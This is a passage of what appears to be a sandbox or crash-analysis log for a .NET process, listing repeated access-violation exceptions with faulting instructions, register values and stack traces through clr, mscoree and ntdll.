RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x84391a8
0x8438c59
0x8438b75
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 46406964
1 0 0

__exception__

 stacktrace: 
0x8438d96
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x84391a8
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 45157532
registers.ecx: 44144812
1 0 0

__exception__

 stacktrace: 
0x8438d96
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335508
registers.edi: 3335756
registers.eax: 0
registers.ebp: 3335768
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x84391a8
0x8438c59
0x8438b8d
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335744
registers.edi: 3336028
registers.eax: 0
registers.ebp: 3335752
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 45575632
1 0 0

__exception__

 stacktrace: 
0x843d3e5
0x843d2b8
0x8438b75
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843d866
0x843d2b8
0x8438b75
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 47132356
1 0 0

__exception__

 stacktrace: 
0x843d3e5
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843d866
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 48483656
1 0 0

__exception__

 stacktrace: 
0x843d3e5
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843d866
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 49834956
1 0 0

__exception__

 stacktrace: 
0x843db34
0x843d9e8
0x8438b75
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843de0a
0x843d9e8
0x8438b75
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 44794484
1 0 0

__exception__

 stacktrace: 
0x843db34
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x843cfb0
0x843de0a
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
